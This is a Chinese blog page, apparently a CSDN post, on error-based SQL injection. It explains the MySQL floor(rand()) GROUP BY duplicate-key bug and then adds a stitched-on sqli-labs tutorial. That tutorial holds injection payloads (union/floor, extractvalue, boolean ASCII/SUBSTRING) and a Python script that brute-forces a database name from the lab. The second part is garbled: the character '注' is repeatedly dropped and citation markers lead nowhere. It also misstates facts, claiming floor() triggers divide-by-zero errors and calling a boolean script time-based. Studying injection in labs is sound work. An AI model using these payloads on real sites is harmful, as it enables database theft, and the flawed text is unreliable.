报错型盲注原理分析

 前言

众所周知,盲注并不会返回错误信息,使得sql注入的难度提高。而报错型注入则是利用了MySQL的第8652号bug :Bug #8652 group by part of rand() returns duplicate key error来进行的盲注,使得MySQL由于函数的特性返回错误信息,进而我们可以显示我们想要的信息,从而达到注入的效果;当然其他类型的数据库也存在相应的问题,在此我们不提。
原理剖析

Bug 8652的主要内容就是在使用group by 对一些rand()函数进行操作时会返回duplicate key 错误,而这个错误将会披露关键信息,如

"Duplicate entry '####' for key 1"

这里的####正是用户输入的希望查询的内容

而该bug产生的主要原因就是:在rand()和group by同时使用到的时候,可能会产生超出预期的结果,因为会多次对同一列进行查询

对这个bug的利用

显然,我们需要巧妙地构造出能够触发上面这种类型报错的语法,或者说是公式来有意地触发bug。

原理

通用的公式:
?id=1' union Select 1,count(*),concat(你希望的查询语句,floor(rand(0)*2))a from information_schema.columns group by a

在进行查询时,sql会根据需要建立临时表进行数据的存储;

关于为什么会报错,官方介绍中说到,对同一列进行多次查询,即rand多次执行,那么我们可以猜测,当查询第一条语句时,结果为0,可以知道在临时表中键值为0不存在,因此我们会进行插入结果的操作,在插入之前猜测rand再次执行,因此插入了键值为1的结果

下一个数:此时已经查询到了第三个数“1”,因为临时表已存在该数,因此count值+1

下一个数:此时查询到0,又因为不存在该值,因此我们又会进行插入结果的操作,继续我们的猜测,在插入前进行rand的再次执行,因此想要插入值为1的新列,而值为1的列已存在,因此报错(count()函数的特性)!

结论

对于一个整数x,对于floor(rand(x)*2)产生的序列,如果在未出现“0011”或“1100”序列前出现“0010“或”1101”,那么该floor(rand(x)*2)产生的序列可用于报错型sql盲注

参考

https://blog.youkuaiyun.com/qq_35544379/article/details/77453019

### SQLI-LABS 报错入解决方案教程 #### 背景介绍 SQL 入是一种常见的安全漏洞,攻击者通过输入恶意的 SQL 查询语句来获取敏感信息或破坏数据库。在 `sqli-labs` 靶场中,报错入是一个重要的学习模块。它利用了某些函数或语法特性,在执行过程中触发错误消息,并从中提取有用的信息。 以下是针对 `sqli-labs` 报错入的具体方法和技巧: --- #### 使用特定函数触发错误 MySQL 提供了一些内置函数,这些函数可以在查询失败时返回详细的错误信息。常用的有以下几个: - **`extractvalue()`**: 可用于从 XML 数据中提取值。如果指定的节点不存在,则会抛出异常。 - **`updatexml()`**: 类似于 `extractvalue()`,但它主要用于更新 XML 文档中的值。 - **`floor()` 和随机数组合**: 利用浮点运算引发除零错误或其他计算错误。 例如,可以通过以下方式构造查询字符串[^2]: ```sql ?id=1' || extractvalue(1,concat(0x3a,(select database()))) --+ ``` 上述语句的作用是从目标数据库中提取当前使用的数据库名称。 --- #### 结合联合查询与条件判断 为了进一步验证是否存在入点以及如何绕过过滤器,可以尝试使用布尔的方式逐步缩小范围。比如,假设需要猜测第 i 位字符是否为某个具体字母 a-z 或 A-Z,可采用如下形式[^3]: ```sql ?id=1 AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='security'),i,1))>ascii_value -- ``` 这里的关键在于调整变量 `i` 来定位不同的位置,并比较其对应的 ASCII 值大小关系。 --- #### 自动化工具辅助分析 手动测试虽然有助于理解原理,但在实际场景下效率较低。因此推荐借助一些自动化脚本或者开源项目完成批量探测工作。Burp Suite Pro 版本自带 Intruder 功能非常适合此类任务;另外还有专门设计用来处理 Web 应用程序安全性评估工作的 OWASP ZAP 工具可供选择。 对于初学者来说,也可以编写简单的 Python 脚本来实现基本功能。下面给出一段示范代码片段作为参考[^4]: ```python import requests url = "http://localhost/sqli-labs/Less-5/?id=" payload_template = "' OR (SELECT ASCII(SUBSTR(({query}),{pos},1)))={char}-- " characters = range(32, 127) def get_char(pos): for char in characters: payload = url + payload_template.format(query="database()", pos=pos, char=char) response = requests.get(payload).text if "You are in" in response: return chr(char), True return None, False result = "" for position in range(1, 9): # Assuming DB name length is known to be 8 chars. next_character, success = get_char(position) if not success: break result += str(next_character) print(f"The extracted db name is {result}") ``` 此脚本实现了基于时间延迟反馈机制下的单字节恢复过程演示效果。 --- #### 意事项 尽管以上技术能够有效帮助学员掌握核心概念,但仍需意合法合规前提下方能实践演练。切勿非法入侵他人系统! ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

StriveBen

写字不易,给点动力吧

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值